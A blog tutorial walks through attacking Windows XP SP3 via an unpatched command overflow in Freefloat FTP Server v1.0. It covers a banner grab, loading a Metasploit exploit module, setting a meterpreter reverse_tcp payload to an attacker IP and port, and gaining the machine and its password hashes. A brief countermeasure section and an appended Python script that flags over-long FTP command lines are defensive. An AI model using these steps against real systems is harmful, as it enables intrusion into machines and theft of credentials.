Hacking Windows XP SP3 via Freefloat FTP Server Command Overflow Vulnerability(Zeroday)


Type : Tutorial

Level : Medium

Victim O.S : Windows XP SP 3

Victim Vulnerable Application : Freefloat FTP Server v1.0

Attacker O.S : Backtrack 5 R1

Exploit Credit : Veerendra G.G SecPod Technologies (www.secpod.com)

This is another vulnerable application that I found while browsing Packet Storm. In this tutorial I will explain, step by step and in detail, how to perform the attack using the Metasploit Framework.

Requirements :

1. Metasploit framework

2. freefloat_ftp_apee_cmd.rb exploit script (click here)

3. Freefloat FTP server v1.0 (download from mediafire.com)


Step By Step :

Attacker IP : 192.168.8.93

Victim IP : 192.168.8.91

1. First we need to do some scanning to find out whether anyone on our network is running the vulnerable software. Let's say I already know there is a computer with port 21 (FTP) open at IP 192.168.8.91. Next I want to know what software it is running, which a simple banner grab will show.

ftp 192.168.8.91


There it is 😛 the victim uses Freefloat FTP server.

2. Copy the freefloat_ftp_apee_cmd.rb to /pentest/exploits/framework/modules/exploits/remote/ folder.

cp freefloat_ftp_apee_cmd.rb /pentest/exploits/framework/modules/exploits/remote/

3. Next, prepare the Metasploit console by running the msfconsole command, then load the exploit.

msf > use exploit/remote/freefloat_ftp_apee_cmd
msf  exploit(freefloat_ftp_apee_cmd) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp


4. There are a few options you need to set when using this exploit (listed below); to view all the options, run the show options command.


Information :

set rhost 192.168.8.91 --> set your target IP Address

set lhost 192.168.8.93 --> attacker computer IP address

set lport 443 --> port of your local computer used to handle the payload

5. With everything set up, the last step is to run the exploit with the exploit command and see whether it works.


PWNED!

We got the victim machine and also the password hash (click here to view how to crack the password hash). If you want to know more about what meterpreter can do, you can view the tutorials here and here.

Countermeasure :

1. As of the time I am writing this tutorial (11-9-2011) there is still no fix; you can temporarily switch to another FTP server application until the developer fixes it.
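
While the server is still in use, the FTP control channel can be watched for the kind of command line a command overflow needs. The following is an added example, not part of the original tutorial or the exploit module: it assumes the overflow is triggered by an over-long command line, and the 512-byte limit, the function names and the sample session are constructed for illustration.

```python
import re

MAX_LINE = 512  # assumed threshold; tune it to what your real FTP clients send
# FTP verbs are short ASCII words, optionally followed by one argument
VERB_RE = re.compile(rb"^([A-Za-z]{3,4})(?: (.*))?$", re.S)
# 64 or more copies of the same byte in a row looks like padding
PADDING_RE = re.compile(rb"(.)\1{63,}", re.S)

def inspect_line(raw):
    """Return the reasons one control-channel line looks like an overflow attempt."""
    line = raw.rstrip(b"\r\n")
    reasons = []
    if len(line) > MAX_LINE:
        reasons.append(f"length {len(line)} > {MAX_LINE}")
    match = VERB_RE.match(line)
    if not match:
        reasons.append("not a well-formed command")
        return reasons
    arg = match.group(2) or b""
    # Note: UTF-8 file names also trip this check; treat it as a weak signal
    if any(b < 0x20 or b > 0x7E for b in arg):
        reasons.append("non-printable bytes in argument")
    if PADDING_RE.search(arg):
        reasons.append("64+ repeated bytes in argument")
    return reasons

def scan(session):
    """session: iterable of (source_ip, raw_line) pairs; returns a list of alerts."""
    alerts = []
    for src, raw in session:
        reasons = inspect_line(raw)
        if reasons:
            verb = raw.split(b" ", 1)[0].strip()[:8].decode("ascii", "replace")
            alerts.append({"src": src, "verb": verb, "reasons": reasons})
    return alerts

# Constructed sample session: ordinary commands plus one oversized line
SAMPLE = [
    ("192.168.8.50", b"USER anonymous\r\n"),
    ("192.168.8.50", b"PASS guest@example.com\r\n"),
    ("192.168.8.50", b"LIST\r\n"),
    ("192.168.8.93", b"USER anonymous\r\n"),
    ("192.168.8.93", b"STOR " + b"A" * 600 + b"\xff\xfe\r\n"),
]

if __name__ == "__main__":
    for alert in scan(SAMPLE):
        print(alert["src"], alert["verb"], "; ".join(alert["reasons"]))
```

The same checks can be expressed as a length rule in an IDS that inspects port 21 traffic; the script form is useful for replaying saved FTP logs.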

Hope it's useful 🙂


Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

Website : http://www.vishnuvalentino.com

  • fatmir

    I can't locate a /pentest/exploits/framework/modules/exploits/remote/ folder

    after pentest/exploits/ I have just framework2 and 3….can I put this script in framework 3?!

    • v4L

      #fatmir
      Yes, you can put it in your framework3 folder; they have the same structure.